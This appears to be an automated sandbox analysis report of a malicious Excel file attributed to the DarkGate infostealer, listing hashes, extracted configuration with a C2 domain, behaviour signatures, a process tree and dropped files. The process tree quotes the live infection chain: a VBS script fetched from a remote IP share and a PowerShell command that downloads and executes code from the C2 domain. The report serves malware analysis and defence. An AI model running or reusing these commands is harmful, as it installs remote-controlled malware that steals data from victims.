Analysis

  • max time kernel
    385s
  • max time network
    373s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-02-2024 15:13

General

  • Target

    scanned_doc#2024-27-2_4065.xlsx

  • Size

    55KB

  • MD5

    c8d22d559dacad7baca08452fcc1d577

  • SHA1

    bb284b30a3d39019e4da6ec6d0d76a9bd0b879a7

  • SHA256

    1a147476f428a3e54505880bb38adb56b8b7dcf8e5d0d0312204396c41b81a1c

  • SHA512

    86fcca800930fd2f72d36d00b6695dda43966a2b26a1c86d5aa35a1d9e27927ff266bb5bb09e7fd46b5428fb5054f623f049ed7005b8d82055e5af71c86c4355

  • SSDEEP

    1536:p/ToOEjzAw7Y2r7DUsV4XzY9t3jSagJYwehV:BoOAcw7nXDUsOjm3jTxhV

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

remasterprodelherskjs.com

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    PAuTCBnH

  • minimum_disk

    50

  • minimum_ram

    7000

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin888

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Detect DarkGate stealer 15 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:4672
        • \??\c:\windows\SysWOW64\cmd.exe
          "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\cahbedg\ & rmdir /s /q C:\ProgramData\cahbedg\
          3⤵
            PID:4956
            • \??\c:\windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              4⤵
              • Runs ping.exe
              PID:3988
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:3804
          • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
            2⤵
            • Adds Run key to start application
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            PID:1484
        • C:\Windows\system32\SppExtComObj.exe
          C:\Windows\system32\SppExtComObj.exe -Embedding
          1⤵
            PID:3532
          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
            1⤵
              PID:3708
            • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
              "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scanned_doc#2024-27-2_4065.xlsx"
              1⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3140
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\yellow.vbs"
                2⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:4484
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'remasterprodelherskjs.com/wzglcrnu')
                  3⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:964
                  • C:\temp\AutoIt3.exe
                    "C:\temp\AutoIt3.exe" script.a3x
                    4⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:4824

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\cahbedg\egdhaca

              Filesize

              1KB

              MD5

              5a77c2e2f71328f681c69a28f25c90e2

              SHA1

              67f5c499e6cef8454125a9cfabc960f497ca7b1a

              SHA256

              20f6d702eecea3b1d2dbc9bd4fbc4d2919ccd01ef6e27f2e54319383909199bb

              SHA512

              21b59e0f4b48fa38a94c2dacce0c607cebef62e8faed5ac71f99bc1bc494bdbf7f0375c74b95f38945d672c4f3747973d9f71b669a83ed8a253602e539f30eaa

            • C:\ProgramData\cahbedg\fbfacef.a3x

              Filesize

              479KB

              MD5

              8dfa9e2612156d66505c2992bbc545b2

              SHA1

              36d46eb2a4ce57aec9d48a400ea184d10b272a87

              SHA256

              ce6c96f1d2f17e682975219f7bda6933f9a954199f35bab8bbee8a4fc1b392ca

              SHA512

              69b75c5396cb9d5c7d76ca63b65bd4381849203aaab23645209427df4484e0ab5218c6b0ded977a5c14cfe89db4f8fb76f51b7ba7f1e20c6cf6742dfec1d3b28

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wquhvba4.wiz.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\aKGdAff

              Filesize

              32B

              MD5

              810139ec7a9c791f4bfd15ebe236bfb1

              SHA1

              3fc2caa7e2bd75d585a7072a937b902a0aa1325b

              SHA256

              29c1b5eb5a0e339a5fa080bd65899a44c47a3a83279135f5dcdb9b6b9111adea

              SHA512

              713661edbf22a7b92b9e6cdd6c66d41f6f9cc065032b0075d41c3eed567a60e6266fa364e3faea85c9b2fc582f09c2412146db3357eed9dc864b637587a3d7e1

            • C:\temp\AutoIt3.exe

              Filesize

              872KB

              MD5

              c56b5f0201a3b3de53e561fe76912bfd

              SHA1

              2a4062e10a5de813f5688221dbeb3f3ff33eb417

              SHA256

              237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

              SHA512

              195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

            • C:\temp\AutoIt3.exe

              Filesize

              512KB

              MD5

              5c3b17ef0a8665eadcc9e78656080b51

              SHA1

              a97011b64212a761c02fc1dc53598310b23d9e1d

              SHA256

              e008ee57854b1a5b2cf470d68cd6a79bd8125019d5ab5788e4698c9c674bff5b

              SHA512

              5c4fb648dc730da43aca9f08f5d453e5ff991f748c375480637de12aecde85e7d9bd8ff90bc5fcd964b72a808a24efee0ae096879a49eda89bd2f7b59d600152

            • C:\temp\cbbfbgf

              Filesize

              4B

              MD5

              db95593b66882f4d24ec1f1381df691e

              SHA1

              f25fe65533cc1105a9866c5b03aa0938e24ae8cf

              SHA256

              f6054abd8fae8c159f366e8856cf4e7593d99288249e342cb0cd9dbfac953cf0

              SHA512

              7424d228144037c5f7505278aefbc4f0ccb53c57f1a854c932aab59ab3781da84c05d6a089c4f2aed9fc2627f909e95396f80f73c8f7c405b8fac0d17ab0c973

            • C:\temp\cbbfbgf

              Filesize

              4B

              MD5

              25dea593d079be2971f19ba8f0a366ff

              SHA1

              0d1b5b0fd9c65d842cf97c7d8940858cc5b5ad0b

              SHA256

              1a0c7111c13c248e3a5b28cf8659cee3ac207dd5070412a6a764aaa6b7ddd875

              SHA512

              240fd4848b97a76f5638b8277883fc6f67f9f9ef42185ca6cf600aa108f1df9303bfcc928e7c263aec6e115a99e3f5893688c1c56fd09a156b828cf51f833841

            • C:\temp\hbgdfgc

              Filesize

              4B

              MD5

              260578deb0f431be2ed7a532068ed914

              SHA1

              97c4913c51e901a5f36db8a2d14892cdbc93527e

              SHA256

              e215ccb0fc8783894cf305b77770a137220c103a689159ebefc341041d710475

              SHA512

              1df04f760f8e1134b6a1bf7f106a1210ab5eb3eb0fad558e6a2c28dda95ec4dd85967eceead137ff32bc6b43402fb5fca04bc7d8253e4d8a34e67d81c7f0e51c

            • C:\temp\script.a3x

              Filesize

              469KB

              MD5

              fed1cada5e6082bc1393036555d061b9

              SHA1

              37b1a821af0e64104c9ffcb8fa39ab4d78c7374d

              SHA256

              2c8ddb6ee845e48c776da5e06cbaf4529b5909384e4786f533d6dd3b679d295c

              SHA512

              6d0fa057c3a1a9aaf39a6fe596d5a12a5f5689dc48811c2e09c001e63f9712e9103d2d21c6afb1d4321823bf6c78263818695e3c8f821f39ad2f4d89404bf630

            • C:\temp\test.txt

              Filesize

              76B

              MD5

              84daf31ae22d4a6a40b0fffda6ea2995

              SHA1

              7912e09030e200187682f5253068b27fd824faf2

              SHA256

              c490210dba7ecd1a4987d4dab36d3f6d5a0a1a7eaf47f1e3cf0f93dd4244e65d

              SHA512

              69210ed3bb6ee8aa0e7a8a5d148774aaae4e58390736354f5ac1ed5919714778234a3d79358dc6299bdcd12a754adbdadee17b4349061107981d865b84245f46

            • memory/964-44-0x00000231E8390000-0x00000231E83A0000-memory.dmp

              Filesize

              64KB

            • memory/964-43-0x00007FFE28870000-0x00007FFE29332000-memory.dmp

              Filesize

              10.8MB

            • memory/964-61-0x00007FFE28870000-0x00007FFE29332000-memory.dmp

              Filesize

              10.8MB

            • memory/964-45-0x00000231E8AC0000-0x00000231E8C82000-memory.dmp

              Filesize

              1.8MB

            • memory/964-42-0x00000231E8280000-0x00000231E82A2000-memory.dmp

              Filesize

              136KB

            • memory/1484-97-0x0000000002FE0000-0x0000000003782000-memory.dmp

              Filesize

              7.6MB

            • memory/1484-94-0x0000000002FE0000-0x0000000003782000-memory.dmp

              Filesize

              7.6MB

            • memory/1484-92-0x0000000002FE0000-0x0000000003782000-memory.dmp

              Filesize

              7.6MB

            • memory/1484-86-0x0000000002FE0000-0x0000000003782000-memory.dmp

              Filesize

              7.6MB

            • memory/3140-4-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-7-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-29-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-30-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-12-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-20-0x00007FFE51D00000-0x00007FFE51DBD000-memory.dmp

              Filesize

              756KB

            • memory/3140-19-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-0-0x00007FFE13390000-0x00007FFE133A0000-memory.dmp

              Filesize

              64KB

            • memory/3140-18-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-11-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-9-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-17-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-8-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-13-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-10-0x00007FFE10980000-0x00007FFE10990000-memory.dmp

              Filesize

              64KB

            • memory/3140-14-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-5-0x00007FFE13390000-0x00007FFE133A0000-memory.dmp

              Filesize

              64KB

            • memory/3140-21-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-15-0x00007FFE10980000-0x00007FFE10990000-memory.dmp

              Filesize

              64KB

            • memory/3140-1-0x00007FFE13390000-0x00007FFE133A0000-memory.dmp

              Filesize

              64KB

            • memory/3140-6-0x00007FFE13390000-0x00007FFE133A0000-memory.dmp

              Filesize

              64KB

            • memory/3140-2-0x00007FFE13390000-0x00007FFE133A0000-memory.dmp

              Filesize

              64KB

            • memory/3140-16-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/3140-3-0x00007FFE53300000-0x00007FFE53509000-memory.dmp

              Filesize

              2.0MB

            • memory/4672-81-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-87-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-88-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-90-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-76-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-93-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-95-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-96-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4672-98-0x0000000002EF0000-0x0000000003692000-memory.dmp

              Filesize

              7.6MB

            • memory/4824-77-0x00000000065B0000-0x00000000068FF000-memory.dmp

              Filesize

              3.3MB

            • memory/4824-70-0x00000000065B0000-0x00000000068FF000-memory.dmp

              Filesize

              3.3MB

            • memory/4824-66-0x00000000050C0000-0x0000000006090000-memory.dmp

              Filesize

              15.8MB